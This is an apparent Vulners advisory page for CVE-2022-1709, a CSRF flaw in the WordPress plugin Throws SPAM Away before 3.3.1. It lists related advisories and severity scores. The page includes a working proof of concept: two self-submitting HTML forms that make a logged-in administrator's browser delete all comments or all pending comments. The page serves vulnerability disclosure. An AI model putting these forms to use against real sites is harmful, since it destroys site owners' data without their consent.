Lucene search
+L

Throws SPAM Away < 3.3.1 - Comment Deletion via CSRF

🗓️ 16 May 2022 00:00:00Reported by Daniel RufType 
wpexploit
 wpexploit
👁 120 Views

Comment Deletion via CSRF in Throws SPAM Away plugi

Related
Code
ReporterTitlePublishedViews
Family
ATTACKERKB
CVE-2022-1709
8 Jun 202210:15
attackerkb
Circl
CVE-2022-1709
8 Jun 202214:45
circl
CNNVD
WordPress plugin Throws SPAM Away 跨站请求伪造漏洞
8 Jun 202200:00
cnnvd
CNVD
WordPress Throws SPAM Away plugin cross-site request forgery vulnerability
13 Jun 202200:00
cnvd
CVE
CVE-2022-1709
6 Jun 202208:51
cve
Cvelist
CVE-2022-1709 Throws SPAM Away < 3.3.1 - Comment Deletion via CSRF
6 Jun 202208:51
cvelist
EUVD
EUVD-2022-24992
3 Oct 202520:07
euvd
NVD
CVE-2022-1709
8 Jun 202210:15
nvd
OSV
CVE-2022-1709
8 Jun 202210:15
osv
Patchstack
WordPress Throws SPAM Away plugin <= 3.3 - Comment Deletion via Cross-Site Request Forgery (CSRF) vulnerability
16 May 202200:00
patchstack
Rows per page
To delete all comments
<form id="test" action="https://example.com/wp-admin/admin.php?page=throws-spam-away%2Fthrows_spam_away_comments.php" method="POST">
    <input type="text" name="c_all" value="a">
    <input type="text" name="all" value="a">
    <input type="text" name="Submit" value="Delete all Comments">
</form>
<script>
    document.getElementById("test").submit();
</script>


<form id="test" action="https://example.com/wp-admin/admin.php?page=throws-spam-away%2Fthrows_spam_away_comments.php" method="POST">
    <input type="text" name="c_pend" value="p">
    <input type="text" name="pend" value="p">
    <input type="text" name="Submit" value="Delete all pending Comments">
</form>
<script>
    document.getElementById("test").submit();
</script>

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

16 May 2022 07:02Current
0.7Low risk
Vulners AI Score0.7
CVSS 3.14.3
CVSS 24.3
EPSS0.00412
120